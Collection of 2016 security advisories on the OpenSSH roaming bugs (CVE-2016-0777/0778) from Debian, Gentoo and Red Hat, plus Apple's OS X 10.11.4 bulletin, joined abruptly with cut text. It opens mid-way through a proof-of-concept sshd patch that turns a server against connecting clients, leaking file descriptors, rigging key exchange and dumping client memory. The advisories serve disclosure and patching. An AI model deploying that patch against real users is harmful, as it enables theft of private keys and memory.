0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p2 \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. Users with private keys that are not protected by a\npassphrase are advised to generate new keys if they have connected to\nan SSH server they don\u0027t fully trust. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security update\nAdvisory ID: RHSA-2016:0043-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date: 2016-01-14\nCVE Names: CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 